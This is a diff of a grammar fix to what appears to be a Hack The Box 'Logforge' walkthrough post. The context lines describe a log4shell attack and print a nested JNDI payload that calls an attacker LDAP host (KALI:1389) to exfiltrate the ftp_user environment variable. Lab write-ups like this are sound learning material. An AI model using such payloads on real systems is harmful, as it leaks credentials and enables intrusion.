0xZon/0xZon.github.io/_posts/2022-1-17-HTB-Logforge.md

 Now I can use `jd-gui` to pick apart this code.

-It looks like it it storing the username and password in a environment variable.
+It looks like it it storing the username and password in an environment variable.
 I can use the log4shell vulnerability to extract the variables.
 ![Logforge](https://raw.githubusercontent.com/0xZon/0xZon.github.io/main/assets/img/logforge/5.png)

 To do this we are going to edit our original payload and add a nested JDNI payload to extract the username and password.
-The JNDI exploit kit wont be able to catch the results but wireshark will. (make sure the JNDI server is still running)
+The JNDI exploit kit won't be able to catch the results but wireshark will. (make sure the JNDI server is still running)

 First I created my nested payload `${jndi:ldap://KALI:1389/${env:ftp_user}}` Then I started up wireshark and started to listen on tun0